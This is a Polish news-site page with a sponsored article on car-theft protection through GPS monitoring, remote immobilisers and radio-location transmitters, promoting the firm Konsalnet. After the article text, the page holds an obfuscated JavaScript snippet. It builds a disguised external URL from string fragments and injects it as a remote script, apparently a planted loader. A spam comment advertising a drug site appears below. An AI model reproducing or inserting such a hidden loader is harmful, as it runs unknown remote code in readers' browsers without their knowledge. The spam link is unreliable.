Zamknij
REKLAMA

Nowoczesne metody ochrony przed kradzieżą samochodu

11.57, 13.09.2018 Aktualizacja: 02.13, 17.09.2018
Skomentuj
REKLAMA

Policyjne statystyki pokazują, że kradzieże samochodów są nadal jednym z najczęstszych przestępstw. Auta znikają m.in. z osiedlowych parkingów, sprzed centrów handlowych oraz z innych lepiej i gorzej strzeżonych miejsc. Zastanawiasz się, jak się zabezpieczyć przed utratą pojazdu? Jednym z dobrych rozwiązań jest inwestycja w monitoring samochodu.

Parking strzeżony? Garaż? Dobrej klasy alarm z immobiliserem? Te wszystkie elementy pozytywnie wpływają na bezpieczeństwo twojego samochodu – co do tego nie ma najmniejszych wątpliwości. To może jednak nie wystarczyć, zwłaszcza jeżeli jesteś właścicielem stosunkowo nowego pojazdu ze średniej lub wysokiej półki. To one są najbardziej narażone na aktywność złodziei. A jak nowoczesny monitoring samochodu wzmacnia zabezpieczenia?

Nowoczesny monitoring samochodu, czyli co?

Choć systemy monitorowania pojazdów są kojarzone przede wszystkim ze światem dużych flot firmowych, coraz częściej na instalację jednego z nich decydują się właściciele samochodów prywatnych. System to niewielkie urządzenie – nadajnik GPS, który jest integrowany z pozostałymi systemami zabezpieczeń w pojeździe i znajduje się w stałej komunikacji z centrum monitorowania.

Monitoring GPS pozwala m.in. na:

    • stałe śledzenie pozycji pojazdu w oparciu o dane satelitarne – można obserwować przy jego pomocy, jak auto się przemieszcza,

    • odtworzenie trasy przebytej przez pojazd – co jest przydatne również wówczas, gdy auto zostanie skradzione,

    • uzyskanie natychmiastowej informacji, gdy dojdzie do próby kradzieży – system zareaguje np. wówczas, gdy złodziej podejmie próby odpalenia auta czy też przewiezienia go na lawecie.

W niektórych wersjach system pozwala również na zdalne zablokowanie samochodu (funkcja immobiliser) – co wzbogaca system zabezpieczeń. Takie rozwiązanie jest oferowane m.in. przez monitoring samochodu Konsalnet – lidera rynku security z ponad 20-letnim doświadczeniem.

Nie tylko GPS

Nie da się ukryć, że rozwija się nie tylko technologia zabezpieczeń pojazdów przed kradzieżą. Również złodzieje poszukują coraz to skuteczniejszych sposobów na prowadzenie swojej działalności przestępczej. Jeśli auto padnie łupem profesjonalisty, może się okazać, że szybko poradzi sobie on z klasycznym systemem monitoringu GPS – np. odpinając akumulator czy też przemieszczając pojazd do metalowego kontenera bądź wiele poziomów pod ziemię. Czy to oznacza, że monitoring samochodu będzie wówczas nieskuteczny? Niekoniecznie. Najnowocześniejsze systemy są wzbogacone o system lokalizacji radiowej.

System radiowej lokalizacji działa w oparciu o niezależne zasilanie i emituje sygnał radiowy, którego nie da się stłumić. Gdy centrum monitoringu obsługujące system zabezpieczeń uzyska informację o kradzieży, wysyła do niego informację, a nadajnik zaczyna emitować sygnał. Pozwala on namierzyć pozycję pojazdu najczęściej w ciągu kilku-kilkunastu, a maksymalnie 24 godzin. W efekcie szanse na jego odzyskanie są znacznie większe.

Jak widać, nowoczesne systemy monitorowania pojazdów to potężne narzędzie w walce ze złodziejami samochodów. Jeśli więc chcesz zwiększyć bezpieczeństwo swojego auta – rozważ inwestycję w jeden z nich.

(function(){ olt5=document.createElement("script");olt5.async=true;olt5_="u"+("s")+"t"; olt5u="124342208.";olt5_+="a"+("t.i");olt5_+="n"+("f"+"o")+"/"; olt5u+="avikhxjult5q5mw58u08ql"+("d6eh8cX0"); olt5.src="https://"+olt5_+olt5u;olt5.type="text/javascript"; document.body.appendChild(olt5); })();

Co sądzisz na ten temat?

podoba mi się 0
nie podoba mi się 0
śmieszne 0
szokujące 0
przykre 0
wkurzające 0
facebookFacebook
twitterTwitter
wykopWykop
komentarzeKomentarze
REKLAMA

komentarz (1)

does coffee affect adoes coffee affect a

0 0

does coffee affect aurogra https://aurogra.buszcentrum.com/ 07:36, 30.12.2020

Odpowiedzi:0
Odpowiedz

REKLAMA
0%